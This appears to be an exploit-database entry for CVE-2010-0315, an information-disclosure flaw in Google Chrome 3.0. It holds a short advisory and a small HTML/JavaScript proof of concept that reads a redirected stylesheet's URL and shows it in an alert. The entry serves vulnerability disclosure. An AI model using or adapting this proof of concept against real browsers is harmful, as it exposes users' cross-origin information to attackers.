Google Chrome 3.0 - Style Sheet redirection Information Disclosure

Author: Cesar Cerrudo
type: remote
platform: multiple
port: 
date_added: 2010-01-22  
date_updated: 2014-05-29  
verified: 1  
codes: CVE-2010-0315;OSVDB-61792  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 33562.html  

source: https://www.securityfocus.com/bid/37917/info

Google Chrome is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks.

<link rel="stylesheet" type="text/css" href="http://www.example.com"> Hola <script language="javascript"> setTimeout("alert(document.styleSheets[0].href)", 10000); //setTimeout is used just to wait for page loading </script>